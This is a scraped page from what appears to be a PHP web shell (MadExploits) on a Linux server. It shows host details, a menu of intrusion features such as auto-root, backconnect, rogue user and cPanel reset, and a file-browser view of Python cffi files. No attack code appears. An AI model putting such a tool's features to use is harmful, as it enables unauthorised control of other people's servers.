Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.71.254.52
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib64 /
python3.6 /
site-packages /
cffi /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
479
B
-rw-r--r--
_cffi_errors.h
3.71
KB
-rw-r--r--
_cffi_include.h
11.86
KB
-rw-r--r--
_embedding.h
15.65
KB
-rw-r--r--
api.py
39.72
KB
-rw-r--r--
backend_ctypes.py
41.1
KB
-rw-r--r--
cffi_opcode.py
5.59
KB
-rw-r--r--
commontypes.py
2.63
KB
-rw-r--r--
cparser.py
38.33
KB
-rw-r--r--
error.py
666
B
-rw-r--r--
ffiplatform.py
3.95
KB
-rw-r--r--
lock.py
747
B
-rw-r--r--
model.py
21.05
KB
-rw-r--r--
parse_c_type.h
5.84
KB
-rw-r--r--
recompiler.py
61.93
KB
-rw-r--r--
setuptools_ext.py
8.01
KB
-rw-r--r--
vengine_cpy.py
40.5
KB
-rw-r--r--
vengine_gen.py
26.05
KB
-rw-r--r--
verifier.py
10.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lock.py
import sys if sys.version_info < (3,): try: from thread import allocate_lock except ImportError: from dummy_thread import allocate_lock else: try: from _thread import allocate_lock except ImportError: from _dummy_thread import allocate_lock ##import sys ##l1 = allocate_lock ##class allocate_lock(object): ## def __init__(self): ## self._real = l1() ## def __enter__(self): ## for i in range(4, 0, -1): ## print sys._getframe(i).f_code ## print ## return self._real.__enter__() ## def __exit__(self, *args): ## return self._real.__exit__(*args) ## def acquire(self, f): ## assert f is False ## return self._real.acquire(f)
Close